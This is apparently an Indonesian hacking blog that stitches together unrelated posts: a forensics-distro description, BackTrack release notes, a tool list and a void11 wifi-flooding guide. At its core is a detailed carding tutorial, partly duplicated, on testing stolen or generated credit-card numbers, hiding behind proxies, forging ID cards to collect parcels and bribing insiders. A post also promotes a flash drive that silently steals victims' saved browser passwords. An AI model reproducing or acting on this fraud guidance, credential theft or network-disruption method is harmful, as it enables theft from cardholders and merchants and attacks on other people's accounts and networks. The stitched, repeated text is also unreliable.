Turiturial screenshootna
http://linux.softpedia.com/progScreenshots/CAINE-Screenshot-42964.html
download nya
http://linux.softpedia.com/progDownload/CAINE-Download-42964.html
Distro linux khusus untuk Melakukan Forensik pada komputer, seperti merestorasi dan Mengembalikan data yang rusak atau Terhapus dari komputer target, dst. distro ini biasa Digunakan oleh ahli forensik komputer termasuk Penegak hukum, Praktisi, dan institusi pendidikan yang berkaitan dengan keamanan komputer.
Caine (Computer Aided Investigative Environment) adalah berbasis Ubuntu GNU / Linux distribusi hidup diciptakan sebagai sebuah proyek dari Digital Forensics untuk antardepartemen Pusat Penelitian Keamanan (CRIS), didukung oleh Universitas Modena dan Reggio Emilia di Italia. The Caine forensik kerangka berisi kumpulan alat yang dibungkus ke dalam sebuah lingkungan yang ramah pengguna. Juga memperkenalkan fitur baru - ini bertujuan untuk mengisi celah interoperabilitas alat forensik yang berbeda, ia menyediakan GUI homogen digital yang memandu peneliti selama akuisisi dan analisis bukti-bukti elektronik, dan ia menawarkan proses semi-otomatis untuk dokumentasi dan laporan kompilasi.
Senin, 27 Desember 2010
BackTrack4 R2
backtrack 4 r 2 yang merupakan veri terbaru setelah rilis sebelumnya . Nemesis merupakan codename dari backtrack 4 r 2 ini. Nemesis dilengkapi dengan kernel baru yaitu kernel 2.6.35.8 . Versi ini merupakan penyempurnaan dari versi sebelumnya seperti support wireless card yang lebih lengkap.
Beberapa fitur yang baru di dalam backtrak 4 r 2 ini diantaranya :
Kernel 2.6.35.8 – *Much* improved mac80211 stack.
USB 3.0 support.
New wireless cards supported.
All wireless Injection patches applied, maximum support for wireless attacks.
Even *faster* desktop environment.
Revamped Fluxbox environment for the KDE challenged.
Metasploit rebuilt from scratch, MySQL db_drivers working out of the box.
Updated old packages, added new ones, and removed obsolete ones.
New BackTrack Wiki with better documentation and support.
Our most professional, tested and streamlined release ever.
http://www.backtrack-linux.org/
Beberapa fitur yang baru di dalam backtrak 4 r 2 ini diantaranya :
Kernel 2.6.35.8 – *Much* improved mac80211 stack.
USB 3.0 support.
New wireless cards supported.
All wireless Injection patches applied, maximum support for wireless attacks.
Even *faster* desktop environment.
Revamped Fluxbox environment for the KDE challenged.
Metasploit rebuilt from scratch, MySQL db_drivers working out of the box.
Updated old packages, added new ones, and removed obsolete ones.
New BackTrack Wiki with better documentation and support.
Our most professional, tested and streamlined release ever.
http://www.backtrack-linux.org/
Belahar Carding
< span class=" messageBody"> Bagi rekan carder yg memiliki nomor extrapolate, dpt mencoba membuat e-mail bayar pada Network Solutions (www.networksolutions.com) dgn tdk menambah account (JANGAN klik menu pull down : add 1 account e-mail. Sebab kita memanfaatkan NetSol hanya utk mengetahui nomor extrapolate tsb masih berlaku atau tidak), ikuti prosedur selanjutnya, sampai pada sesion pemasukan nomor tadi. Ulangi pengisian nomor apabila ditolak, gunakan nomor lainnya. Jika anda merasa sulit untuk validasi di NetSol (saat ini semakin sulit), kami mencoba memberikan alternatif URL yang dapat anda jadikan referensi dalam hal daftar perusahaan-perusahaan register domain (hanya utk test nomor kartu kredit), yaitu pada www.internic.org/regist.html Atau dpt juga membeli software - software murah di situs - situs penjual software:::...
...:::Anda dpt mengunjungi toko - toko yg ada pada website ini, yg sebagian besar telah kami coba. Dan jgn khawatir, keterangan disamping tokonya adalah pengalaman kami sebenarnya. Masalah sedikit banyaknya yg sudah mengorder di toko tersebut, kami tdk jamin 100%, namun perlu diketahui bhw situs ini tadinya situs pribadi. Jadi sebelum publikasi, hanya "bA" yg mengorder, dan barang yg diorder kuantitasnya minimal sekali, namun rutin (lihat pada halaman 1 daftar online shop, toko timeclub.com yg berkali-kali mengirim barang dlm kurun waktu 1 tahun terakhir ini/th2008):::...
...:::Anda dpt mengorder barang senilai LEBIH DARI US$ 1000 dgn menggunakan trick : *Gunakan identitas palsu pada saat mengambil barang di kantor pos atau jasa pengiriman lainnya (....dgn memalsukan KTM/Kartu Tanda Mahasiswa biasanya lebih mudah, dan foto yg tampak di KTM palsu tadi harus sesuai dgn wajah si "X" yg mengambil barang tsb, di kantor pos atau jasa pengiriman lain). Sedangkan namanya, tetap nama si "X", hanya alamat di kartu identitas yang kita palsukan. Jika ditanya kenapa alamatnya berbeda, alasannya : "....itu alamat lama, dan saya sudah pindah rumah/kost". Apabila nama si "X" (pengambil barang) berbeda dengan nama yang dikirimi barang (hasil dari order), biasanya pihak kantor pos atau jasa pengiriman lainnya akan meminta surat kuasa:::...
...:::Anda dpt mengorder barang senilai US$ 500 dgn menggunakan trick : (bisa juga menggunakan trick diatas) *Bisa menggunakan nama dan alamat asli, karena order barang senilai US$ 500 masih tergolong rendah, atau gunakan alamat Warung Internet (Warnet) tempat anda biasa mengakses (tentunya bekerja sama dengan si penjaga Warnet tsb.):::...
...:::Anda dpt mengorder barang kurang dari US$ 200 dgn aman apabila nomor tersebut bukan milik orang di Indonesia:::...
...:::Apabila anda menggunakan nomor extrapolate yg sudah digunakan pada saat proses validasi di Network Solutions, berarti nomor tersebut telah dicharge sebesar yg anda masukkan tadi, makanya buat serendah - rendahnya dlm membuat domain tadi, misalnya .org (..sekitar US$ 60). So, kalo udah gitu, utk mengetahui besarnya biaya charge dari nomor tsb tinggal jumlahkan aja harga barang yg diorder dengan biaya yg udah dicharge di NetSol tadi. Bila harga barang yg diorder senilai US$ 45, berarti nomor extrapolate yg kita gunakan tsb sudah dicharge sebesar US$ 105:::...
...:::Pada saat proses order (shopping), pengisian data Nama, Alamat dan lainnya milik kita (pembeli/shopper), harus sama dengan alamat yg akan dikirimi barang. Misalnya, si "X" mengorder barang, maka pengisian Billing Address (alamat faktur si pemesan) dan Shipping Address (alamat tujuan pengiriman barang) HARUS SAMA. Jika dlm billing address yg memesan barang atas nama "X", maka pengisian nama pada shipping address harus nama si "X" tadi:::...
...:::Jika anda tinggal di Propinsi Surabaya, sebaiknya alamat pengiriman barang jgn dikirim ke Kota BONEK tsb. Karena apabila anda tidak ada kongkalikong dengan pihak kantor pos atau jasa pengiriman lainnya, jgn pernah mengharap barang akan datang. Apa lagi untuk barang - barang yg tergolong 'wah', namun jika majalah dan CD serta sejenisnya, kemungkinan besar masih bisa. Sebagai masukan, Surabaya menduduki peringkat ke-2 setelah Yogyakarta dlm event kegiatan carding di Asia, sementara Indonesia sendiri menduduki peringkat III dunia masih dlm event kegiatan carding. Bahkan dalam waktu dekat, Indonesia mungkin bisa meraih peringkat I di dunia:::...
...:::Besarnya biaya penebusan dpt bervariasi, tergantung dari (pajak) barang yg kita order (biasanya mulai dari Rp 3000,- sampai lebih dari Rp 100.000,-). Atau ada juga barang yg dikirim langsung ke alamat tujuan. Jangan takut dulu bila anda disuruh menebus dgn biaya tinggi, karena kemungkinan besar barang yg dikirim itu nilainya lebih dari biaya penebusan:::...
...:::Dalam pengisian alamat e-mail (milik kita) utk jalur konfirmasi dari pihak online shop, sebaiknya gunakan alamat 'e-mail bayar'. Karena, selain tidak ada banner (menghemat waktu loading), ada sedikit nilai tambah di mata pihak online shop yg kita order barangnya:::...
...:::Tidak semua online shop yg ada lambang VeriSign di websitenya aman dan ketat dalam proses validasi kepemilikan kartu kredit, jadi jangan patah semangat dulu. Kecuali, pihak online shop melibatkan pihak Pay Pal (pihak ketiga sbg perantara yg menangani sistem pembayaran), itu pun masih bisa kita akali. Caranya, manfaatkan account milik orang bule juga di Pay Pal, lalu gunakan saja dgn percaya diri penuh, seolah - olah kita yg punya account tsb:::...
...:::Jika anda shopping di online shop selain yg berbahasa Inggris, sebaiknya diperhatikan metode pembayarannya/payment sistem/payment methode (kecuali anda menguasai bahasa di negara online shop tsb). Karena jika anda tidak teliti, bisa - bisa anda memilih metode pembayaran
...:::Bila anda mendapat e-mail konfirmasi dari pihak online shop berupa ancaman (..beberapa waktu setelah anda melakukan order), yg mengatakan mereka akan mengadukan perbuatan anda ke federasi/organisasi internasional yg menangani penipuan (fraud) kartu kredit dan akan mengenakan denda sebesar US$ 1000 atas perbuatan anda, jangan takut dulu. Karena itu hanya geretak si customer service online shop aja. Sebab kemungkinan besar, pihak online shop tsb sudah pernah terkena biaya recharge (tagihan balik, alias mengganti biaya produksi kepada si pemilik nomor kartu kredit yg asli). Nah, cuekin aja deh solusinya, masih bejibun online shop yang lain:::...
...:::Jika anda dikirimi email konfirmasi dari pihak online shop berupa e-mail kosong, namun ada file berekstensi .exe yg disertakan di attachment, lebih baik jangan didownload/dieksekusi file tadi. Apalagi jika anda yg mengakses Internet dari rumah (bukan di tempat umum), karena kemungkinan besar file tersebut mengandung trojan. Bila yang mengakses dari tempat umum (misalnya Warnet) dan sudah terlanjur mendownload/mengeksekusi file tersebut, sebaiknya anda berhenti mengakses. Dan pindahlah ke komputer client lainnya, atau bila ingin lebih fresh, pindah ke Warnet lain. Sedangkan jika anda mengakses Internet dari rumah, untuk menjaga kemungkinan dari bahaya trojan, anda bisa menginstall ulang sistem operasi pd komputer anda (dgn asumsi, anda harus menghapus bersih folder sistem operasi anda tersebut sebelum reinstall), dengan sistem operasi yg masih fresh:::...
...:::Catat semua barang yg anda order, dan dikirim atas nama siapa, jgn lupa catat juga tanggalnya. Sebab banyak juga online shop yg tdk mengirimkan e-mail konfirmasi ketika barang akan dikirim. Atau bahkan tidak mengirimkan e-mail konfirmasi kepada kita, saat setelah melakukan order (email konfirmasi biasa, setelah kita order). Gunanya, apabila ada order yg berhasil dikirim, dan atas nama si "X", kita bisa memperkirakan barang apa yg datang, dgn melihat catatan tadi, bhw si "X" memesan barang a, b, atau c (jadi ada nilai kemungkinannya):::...
...:::Jika anda disebut sebagai thief, frauder, etc., pada e-mail konfirmasi dari online shop, cuekin aja, jangan dibalas, karena masih banyak online shop lainnya:::...
...:::Setiap order yg berhasil (barangnya datang), biasanya anda mendapat surat panggilan dari Kantor Pos atau Jasa Pengiriman (<== via telepon) lainnya utk menebus barang tersebut (..utk barang yg kecil biasanya langsung dikirim ke alamat tujuan). Tebuslah barang tsb !! (Apalagi jika anda mengorder barang dalam jumlah besar), guna menjaga kemungkinan barang tsb dialihkan ke Kantor Polisi atau pihak berwenang lainnya:::...
...:::Hindari pemesanan/order yang besar - besar terutama untuk merk - merk terkenal dan mahal, serta perlu diperhatikan JUMLAH barang yg diorder dalam satu kali transaksi, karena jika terlalu banyak dapat menimbulkan kecurigaan pihak online shop/store:::...
...:::Jadilah orang yg sabar, hindari pemesanan yang menggunakan pengiriman express. Sebab, untuk menjaga kewajaran dalam pengeluaran dana dari nomor kartu kredit yg digunakan tersebut. Sehingga pihak online shop/store, berprasangka bahwa kita orang yg cukup memperhitungkan pengeluaran dana:::...
...:::Kesabaran, ketelitian, dan keuletan merupakan modal dasar yg hrs anda miliki. Hilangkan sifat takabur, karena hanya akan mendatangkan kehancuran. Siapkan percaya diri sepenuhnya, seakan - akan kita si pemilik nomor/account (hal ini sangat baik dalam pembentukan mental carder):::...
...:::Pelajari teknik hacking/cracking step by step:::...
...:::Jangan lupa berdoa kepada ***** YME, sesuai dgn agama dan kepercayaan anda. Semoga kita semua dalam lindungan-Nya. Amin:::...
Alternatif Lainnya :
- GANTI PROXY ANDA ( PROXY DIDAPAT DAN DI CHECK DI www.stayinvisible.com)
GANTI PROXY SESUAI DENGAN NEGARA KARTU KREDIT ANDA
- KETIKA KARTU KREDIT SUDAH SIAP DAN PROXY SUDAH SIAP MAKA CHECK
KARTU KREDIT DI www.wallet.yahoo.com
YAHOO WALLET
- setelah dapat kartu kredit yang ok, beli email bayar di yahoomail plus
- dengan email bayar tersebut daftarkan di account www.ebay.com EBAY
- lalu mengecek keberadaan uangnya di www.ibs-authorization.com NGECEK ISI CC DAN
INFORMASI CC
- setelah ada uangnya. buatlah account www.paypal.com PAYPAL dengan cara subscription
- setelah urusan pembayaran telah siap, maka lakukan penawaran barang di www.ebay.com
- setelah ada barang yang dibayar, maka bayarlah dengan account di www.paypal.com PAYPAL
ACCOUNT
TIPS DAN TEKNIK :
- SITUS www.wallet.yahoo.com ( type security rendah = asal CCnya bukan USA )
- situs www.ebay.com ( type security rendah, lakukan transaksi yang bisa dikirim ketempat anda)
- www.ibs-authorization.com CHECK VALIDITAS DAN ISI CC (type security tinggi, harus ganti
proxy dan sangat ketat )
jika memakai kartu kredit generate kemungkinan nya isi kartu kreditnya bisa dilihat 60% saja.
- www.paypal.com (type security tinggi, jika memakai kartu kredit generate hanya 50% accountnya
bisa dipakai)
- INGAT WALAUPUN SUDAH LOLOS YAHOO WALLET BELUM TENTU BERHASIL
DIBELANJAKAN KARENA MUNGKIN SAJA UANGNYA SUDAH HABIS
JADI ngecek di www.ibs-authorization.com sifatnya wajib dan bikin account dipaypal sifatnya tidak
wajib karena ada metode
lainnya yaitu account di bidpay
Page 1 of TUTORIAL CARDING 2
http://users.cjb.net/teknik-carding/ 6/14/2005
tips selanjutnya :
- lebih baik memakai kartu kredit asli, atau jika memakai kartu kredit generate
setelah lolos www.wallet.yahoo.com check apakah ada uangnya tidak di www.ibs-authorization.com
jika sudah ada. maka pada penjual barang untuk dibayar lewat www.bidpay.com
- tingkat security www.bidpay.com lebih rendah dibandingkan www.paypal.com
tips selanjutnya :
- setelah barang selesai dibeli dan dibayar mintalah pada penjual untuk mengirimkan barangnya
sebagai kado atau hadiah untuk
saudara. maka buatlah ktp asli tapi palsu.dan mintalah pada penjual barangnya agar barang dikirim
dengan settingan hargapenjualan cuman dibawah 100$ (untuk menghindari pajak yang besar)
- gunakan kotak pos atau teromolpos (langganan sebaiknya )
- cari orang dalam untuk mengambil barang kita ( upah orang dalam Rp 200.000/paket = paket
dibawah 5 juta =)
...:::Bila anda mendapat e-mail konfirmasi dari pihak online shop berupa ancaman (..beberapa waktu setelah anda melakukan order), yg mengatakan mereka akan mengadukan perbuatan anda ke federasi/organisasi internasional yg menangani penipuan (fraud) kartu kredit dan akan mengenakan denda sebesar US$ 1000 atas perbuatan anda, jangan takut dulu. Karena itu hanya geretak si customer service online shop aja. Sebab kemungkinan besar, pihak online shop tsb sudah pernah terkena biaya recharge (tagihan balik, alias mengganti biaya produksi kepada si pemilik nomor kartu kredit yg asli). Nah, cuekin aja deh solusinya, masih bejibun online shop yang lain:::...
...:::Jika anda dikirimi email konfirmasi dari pihak online shop berupa e-mail kosong, namun ada file berekstensi .exe yg disertakan di attachment, lebih baik jangan didownload/dieksekusi file tadi. Apalagi jika anda yg mengakses Internet dari rumah (bukan di tempat umum), karena kemungkinan besar file tersebut mengandung trojan. Bila yang mengakses dari tempat umum (misalnya Warnet) dan sudah terlanjur mendownload/mengeksekusi file tersebut, sebaiknya anda berhenti mengakses. Dan pindahlah ke komputer client lainnya, atau bila ingin lebih fresh, pindah ke Warnet lain. Sedangkan jika anda mengakses Internet dari rumah, untuk menjaga kemungkinan dari bahaya trojan, anda bisa menginstall ulang sistem operasi pd komputer anda (dgn asumsi, anda harus menghapus bersih folder sistem operasi anda tersebut sebelum reinstall), dengan sistem operasi yg masih fresh:::...
...:::Catat semua barang yg anda order, dan dikirim atas nama siapa, jgn lupa catat juga tanggalnya. Sebab banyak juga online shop yg tdk mengirimkan e-mail konfirmasi ketika barang akan dikirim. Atau bahkan tidak mengirimkan e-mail konfirmasi kepada kita, saat setelah melakukan order (email konfirmasi biasa, setelah kita order). Gunanya, apabila ada order yg berhasil dikirim, dan atas nama si "X", kita bisa memperkirakan barang apa yg datang, dgn melihat catatan tadi, bhw si "X" memesan barang a, b, atau c (jadi ada nilai kemungkinannya):::...
...:::Jika anda disebut sebagai thief, frauder, etc., pada e-mail konfirmasi dari online shop, cuekin aja, jangan dibalas, karena masih banyak online shop lainnya:::...
...:::Setiap order yg berhasil (barangnya datang), biasanya anda mendapat surat panggilan dari Kantor Pos atau Jasa Pengiriman (<== via telepon) lainnya utk menebus barang tersebut (..utk barang yg kecil biasanya langsung dikirim ke alamat tujuan). Tebuslah barang tsb !! (Apalagi jika anda mengorder barang dalam jumlah besar), guna menjaga kemungkinan barang tsb dialihkan ke Kantor Polisi atau pihak berwenang lainnya:::...
...:::Hindari pemesanan/order yang besar - besar terutama untuk merk - merk terkenal dan mahal, serta perlu diperhatikan JUMLAH barang yg diorder dalam satu kali transaksi, karena jika terlalu banyak dapat menimbulkan kecurigaan pihak online shop/store:::...
...:::Jadilah orang yg sabar, hindari pemesanan yang menggunakan pengiriman express. Sebab, untuk menjaga kewajaran dalam pengeluaran dana dari nomor kartu kredit yg digunakan tersebut. Sehingga pihak online shop/store, berprasangka bahwa kita orang yg cukup memperhitungkan pengeluaran dana:::...
...:::Kesabaran, ketelitian, dan keuletan merupakan modal dasar yg hrs anda miliki. Hilangkan sifat takabur, karena hanya akan mendatangkan kehancuran. Siapkan percaya diri sepenuhnya, seakan - akan kita si pemilik nomor/account (hal ini sangat baik dalam pembentukan mental carder):::...
...:::Pelajari teknik hacking/cracking step by step:::...
...:::Jangan lupa berdoa kepada ***** YME, sesuai dgn agama dan kepercayaan anda. Semoga kita semua dalam lindungan-Nya. Amin:::...
Alternatif Lainnya :
- GANTI PROXY ANDA ( PROXY DIDAPAT DAN DI CHECK DI www.stayinvisible.com)
GANTI PROXY SESUAI DENGAN NEGARA KARTU KREDIT ANDA
- KETIKA KARTU KREDIT SUDAH SIAP DAN PROXY SUDAH SIAP MAKA CHECK
KARTU KREDIT DI www.wallet.yahoo.com
YAHOO WALLET
- setelah dapat kartu kredit yang ok, beli email bayar di yahoomail plus
- dengan email bayar tersebut daftarkan di account www.ebay.com EBAY
- lalu mengecek keberadaan uangnya di www.ibs-authorization.com NGECEK ISI CC DAN
INFORMASI CC
- setelah ada uangnya. buatlah account www.paypal.com PAYPAL dengan cara subscription
- setelah urusan pembayaran telah siap, maka lakukan penawaran barang di www.ebay.com
- setelah ada barang yang dibayar, maka bayarlah dengan account di www.paypal.com PAYPAL
ACCOUNT
TIPS DAN TEKNIK :
- SITUS www.wallet.yahoo.com ( type security rendah = asal CCnya bukan USA )
- situs www.ebay.com ( type security rendah, lakukan transaksi yang bisa dikirim ketempat anda)
- www.ibs-authorization.com CHECK VALIDITAS DAN ISI CC (type security tinggi, harus ganti
proxy dan sangat ketat )
jika memakai kartu kredit generate kemungkinan nya isi kartu kreditnya bisa dilihat 60% saja.
- www.paypal.com (type security tinggi, jika memakai kartu kredit generate hanya 50% accountnya
bisa dipakai)
- INGAT WALAUPUN SUDAH LOLOS YAHOO WALLET BELUM TENTU BERHASIL
DIBELANJAKAN KARENA MUNGKIN SAJA UANGNYA SUDAH HABIS
JADI ngecek di www.ibs-authorization.com sifatnya wajib dan bikin account dipaypal sifatnya tidak
wajib karena ada metode
lainnya yaitu account di bidpay
Page 1 of TUTORIAL CARDING 2
http://users.cjb.net/teknik-carding/ 6/14/2005
tips selanjutnya :
- lebih baik memakai kartu kredit asli, atau jika memakai kartu kredit generate
setelah lolos www.wallet.yahoo.com check apakah ada uangnya tidak di www.ibs-authorization.com
jika sudah ada. maka pada penjual barang untuk dibayar lewat www.bidpay.com
- tingkat security www.bidpay.com lebih rendah dibandingkan www.paypal.com
tips selanjutnya :
- setelah barang selesai dibeli dan dibayar mintalah pada penjual untuk mengirimkan barangnya
sebagai kado atau hadiah untuk
saudara. maka buatlah ktp asli tapi palsu.dan mintalah pada penjual barangnya agar barang dikirim
dengan settingan hargapenjualan cuman dibawah 100$ (untuk menghindari pajak yang besar)
- gunakan kotak pos atau teromolpos (langganan sebaiknya )
- cari orang dalam untuk mengambil barang kita ( upah orang dalam Rp 200.000/paket = paket
dibawah 5 juta =)
by : NNN
Sofware edit foto terbaru
1.gimp aplikasi opensource buat ngedit poto garatis ga kalah ma photoshop
http://www.gimp.org/
2. Poroscapehttp://www.photoscape.org/ps/main/download.php
Cara membuat flasdisk auto hack
Turitoriallna dari video aja gann,,,
cara kerja nya dengan menancapkan flasdisk di komputer korban tanpa ada nya autorun /silent dan pasword di firefox korban akan tersimpan outomatis ke flasdisk kita
flasdisk harus suport U3 (sandisk)
http://www.youtube.com/watch?v=lFlgddjOPpw
Aplikasi yg ada pada linux Backtrack
1.1 Information Gathering
1.1.1 0trace 0.01
1.1.2 Ass
1.1.3 dig
1.1.4 DMitry
1.1.5 DNS-Ptr
1.1.6 dnstracer 1.5
1.1.7 dnswalk
1.1.8 dns-bruteforce
1.1.9 dnsenum
1.1.10 dnsmap
1.1.11 DNSPredict
1.1.12 Finger Google
1.1.13 Firewalk
1.1.14 Fport 2.0 (Windows Executable)
1.1.15 Goog Mail Enum
1.1.16 Google-search
1.1.17 Googrape
1.1.18 Gooscan
1.1.19 Host
1.1.20 InTrace 1.3
1.1.21 Itrace
1.1.22 Maltego 2.0
1.1.23 Metagoofil 1.4
1.1.24 Mbenum 1.5.0 (Windows Executable)
1.1.25 Netenum
1.1.26 Netmask
1.1.27 Nmbscan 1.2.4
1.1.28 Protos
1.1.29 PsTools (Windows Executables)
1.1.29.1 PsInfo
1.1.29.2 PsFile
1.1.29.3 PsList
1.1.29.4 PsGetSID
1.1.29.5 PsLoggedOn
1.1.29.6 PsLogList
1.1.30 PStoreView 1.0 (Windows Binary)
1.1.31 QGoogle
1.1.32 Relay Scanner
1.1.33 SMTP-Vrfy
1.1.34 Subdomainer 1.3
1.1.35 TCPtraceroute 1.5beta7
1.1.36 TCtrace
1.1.37 Whoami (Windows Executable)
1.2 Network Mapping
1.2.1 Amap 5.2
1.2.2 Angry IP Scanner (ipscan) 3.0-beta3
1.2.3 Autoscan 0.99_R1
1.2.4 Fierce 0.9.9 beta 03/24/07
1.2.5 Fping
1.2.6 Genlist
1.2.7 Hping
1.2.8 Hping2 2.0.0-rc3
1.2.9 Hping3 3.0.0-alpha-1
1.2.10 IKE-Scan
1.2.11 IKEProbe
1.2.12 Netcat 0.7.1
1.2.13 Netdiscover
1.2.14 Nmap
1.2.15 NmapFE
1.2.16 P0f
1.2.17 PSK-Crack
1.2.18 Ping
1.2.19 Protos
1.2.20 ScanLine 1.01 (Windows Executable)
1.2.21 Scanrand
1.2.22 SinFP
1.2.23 Umit
1.2.24 UnicornScan
1.2.25 UnicornScan pgsql 0.4.6e module version 1.03
1.2.26 XProbe2
1.2.27 PBNJ 2.04
1.2.27.1 OutputPBNJ
1.2.27.2 ScanPBNJ
1.2.28 Zenmap 4.60
1.3 Vulnerability Identification
1.3.1 Absinthe
1.3.2 Bed
1.3.3 CIRT Fuzzer
1.3.4 Checkpwd
1.3.5 Cisco Auditing Tool
1.3.6 Cisco Enable Bruteforcer
1.3.7 Cisco Global Exploiter
1.3.8 Cisco OCS Mass Scanner
1.3.9 Cisco Scanner
1.3.10 Cisco Torch
1.3.11 Curl
1.3.12 Fuzzer 1.2
1.3.13 GFI LanGuard 2.0
1.3.14 GetSids
1.3.15 HTTP PUT
1.3.16 Halberd
1.3.17 Httprint
1.3.18 Httprint GUI
1.3.19 ISR-Form
1.3.20 Jbrofuzz
1.3.21 List-Urls
1.3.22 Lynx
1.3.23 Merge Router Config
1.3.24 Metacoretex
1.3.25 Metoscan
1.3.26 Mezcal HTTP/S
1.3.27 Mibble MIB Browser
1.3.28 Mistress
1.3.29 Nikto
1.3.30 OAT
1.3.31 Onesixtyone
1.3.32 OpenSSL-Scanner
1.3.33 Paros Proxy
1.3.34 Peach
1.3.35 RPCDump
1.3.36 RevHosts
1.3.37 SMB Bruteforcer
1.3.38 SMB Client
1.3.39 SMB Serverscan
1.3.40 SMB-NAT
1.3.41 SMBdumpusers
1.3.42 SMBgetserverinfo
1.3.43 SNMP Scanner
1.3.44 SNMP Walk
1.3.45 SQL Inject
1.3.46 SQL Scanner
1.3.47 SQLLibf
1.3.48 SQLbrute
1.3.49 Sidguess
1.3.50 Smb4K
1.3.51 Snmpcheck
1.3.52 Snmp Enum
1.3.53 Spike
1.3.54 Stompy
1.3.55 SuperScan
1.3.56 TNScmd
1.3.57 Taof
1.3.58 VNC_bypauth
1.3.59 Wapiti
1.3.60 Yersinia
1.3.61 sqlanlz
1.3.62 sqldict
1.3.63 sqldumplogins
1.3.64 sqlquery
1.3.65 sqlupload
1.4 Penetration
1.4.1 Framework3-MsfC
1.4.2 Framework3-MsfUpdate
1.4.3 Framework3-Msfcli
1.4.4 Framework3-Msfweb
1.4.5 Init Pgsql (autopwn)
1.4.6 Milw0rm Archive
1.4.7 MsfCli
1.4.8 MsfConsole
1.4.9 MsfUpdate
1.4.10 OpenSSL-To-Open
1.4.11 Pirana
1.4.12 Update Milw0rm
1.5 Privilege Escalation
1.5.1 Ascend attacker
1.5.2 CDP Spoofer
1.5.3 Cisco Enable Bruteforcer
1.5.4 Crunch Dictgen
1.5.5 DHCPX Flooder
1.5.6 DNSspoof
1.5.7 Driftnet
1.5.8 Dsniff
1.5.9 Etherape
1.5.10 EtterCap
1.5.11 File2Cable
1.5.12 HSRP Spoofer
1.5.13 Hash Collision
1.5.14 Httpcapture
1.5.15 Hydra
1.5.16 Hydra GTK
1.5.17 ICMP Redirect
1.5.18 ICMPush
1.5.19 IGRP Spoofer
1.5.20 IRDP Responder
1.5.21 IRDP Spoofer
1.5.22 John
1.5.23 Lodowep
1.5.24 Mailsnarf
1.5.25 Medusa
1.5.26 Msgsnarf
1.5.27 Nemesis Spoofer
1.5.28 NetSed
1.5.29 Netenum
1.5.30 Netmask
1.5.31 Ntop
1.5.32 PHoss
1.5.33 PackETH
1.5.34 Rcrack
1.5.35 SIPdump
1.5.36 SMB Sniffer
1.5.37 Sing
1.5.38 TFTP-Brute
1.5.39 THC PPTP
1.5.40 TcPick
1.5.41 URLsnarf
1.5.42 VNCrack
1.5.43 WebCrack
1.5.44 Wireshark
1.5.45 Wireshark Wifi
1.5.46 WyD
1.5.47 XSpy
1.5.48 chntpw
1.6 Maintaining Access
1.6.1 3proxy
1.6.2 Backdoors
1.6.3 Matahari
1.6.4 CryptCat
1.6.5 HttpTunnel Client
1.6.6 HttpTunnel Server
1.6.7 ICMPTX
1.6.8 Iodine
1.6.9 NSTX
1.6.10 Privoxy
1.6.11 ProxyTunnel
1.6.12 Rinetd
1.6.13 TinyProxy
1.6.14 sbd
1.6.15 socat
1.7 Covering Tracks
1.7.1 Housekeeping
1.8 Radio Network Analysis
1.8.1 802.11 WIFI
1.8.1.1 AFrag
1.8.1.2 ASLeap
1.8.1.3 aircrack-ng
1.8.1.4 airdecap-ng
1.8.1.5 aireplay-ng
1.8.1.6 airmon-ng
1.8.1.7 Airpwn
1.8.1.8 AirSnarf
1.8.1.9 airbase-ng
1.8.1.10 airodump-ng
1.8.1.11 Airoscript
1.8.1.12 Airsnort
1.8.1.13 CowPatty
1.8.1.14 FakeAP
1.8.1.15 Hotspotter
1.8.1.16 Karma
1.8.1.17 Kismet
1.8.1.18 MDK3
1.8.1.19 MacChanger
1.8.1.20 WifiTap
1.8.1.21 Wicrawl
1.8.1.22 WifiZoo
1.8.1.23 Wlassistant
1.8.1.24 SpoonDRV
1.8.1.25 SpoonWEP
1.8.2 Bluetooth
1.8.2.1 BTcrack
1.8.2.2 Bluebugger
1.8.2.3 Blueprint
1.8.2.4 Bluesmash
1.8.2.5 Bluesnarfer
1.8.2.6 Btscanner
1.8.2.7 Carwhisperer
1.8.2.8 Frontline
1.8.2.9 Minicom
1.8.2.10 ObexFTP
1.8.2.11 HCIDump
1.8.2.12 Redfang
1.8.2.13 Ussp-Push
1.8.2.14 atshell
1.8.2.15 attest
1.8.2.16 bdaddr
1.8.2.17 bss
1.8.2.18 btftp
1.8.2.19 hcidump-crash
1.8.2.20 hidattack
1.8.2.21 hstest
1.8.2.22 rfcomm
1.9 VOIP & Telephony Analysis
1.9.1 PcapSipDump
1.9.2 PcapToSip_RTP
1.9.3 SIPSak
1.9.4 SIPcrack
1.9.5 SIPdump
1.9.6 SIPp
1.9.7 Smap
1.10 Digital Forensics
1.10.1 Allin1
1.10.2 Autopsy
1.10.3 DCFLDD
1.10.4 DD_Rescue
1.10.5 Foremost
1.10.6 Magicrescue
1.10.7 Mboxgrep
1.10.8 Memfetch
1.10.9 Memfetch Find
1.10.10 Pasco
1.10.11 Rootkithunter
1.10.12 Sleuthkit
1.10.13 Vinetto
1.11 Reverse Engineering
1.11.1 GDB GNU Debugger
1.11.2 GDB Console GUI
1.11.3 GDB Server
1.11.4 GNU DDD
1.11.5 Hexdump
1.11.6 Hexedit
1.11.7 OllyDBG
1.12 Services
1.12.1 SNORT
Dikala anda di warnet dan ga mau nginstall aplikasi bisa menggunakan tool yg bersipat online atau para administrator jaringan bisa mengandal kan layanan tersebut
Hash Generator: http://www.insidepro.com/hashes.php?lang=eng
Online Virus Scanner: http://www.virustotal.com/
Online NMAP Scans: http://nmap-online.com/
DNS Health Check: http://dnssy.com/
Investigate Domains and IPs: http://centralops.net/co/DomainDossier.aspx
NIC Manufacturer Finder: http://www.curreedy.com/stu/nic/
MD5 Hash Cracker: http://milw0rm.com/cracker/insert.php
serang acces point (wi fi) dengan void11 (backtrack)
Void11
Void11 merupakan salah satu aplikasi yang digunakan unutk melakukan mass flooding terhadap Access Point.
Void11 memiliki jenis metode attack, yaitu :
1. Deauthenticate Clients (default mode)
Dengan metode ini, void11 akan melakukan flooding WLAN dengan 'deauthentication packets' sehingga
client yang terautentikasi didalam jaringannya akan ngedrop dan terputus dari jaringan WLAN.
2. Authentication Flood
Dengan metode ini, void11 akan melakukan flooding ke Access Point dengan 'authentication packets (random client MACs)'
3. Association Flood
Dengan metode ini, void11 akan melakukan flooding dengan association packets (random client MACs)
Persiapan :
+ laptop dengan chipset yg bisamode injeksi (atheros,ralink, DLL)
+ Lakukan Warwalking (nyari AP sambil jalan) utk mendapatkan MAC Address + SSID AP si target
+ atau yg penggunak linux selain backtrack Donlod void11 dari : http://lirva32.org/images/void11-0.2.0.tar.bz2
+ Konfigurasi :
cd /tools/wifi/void11-0.2.0/console
iwconfig wlan0 mode master
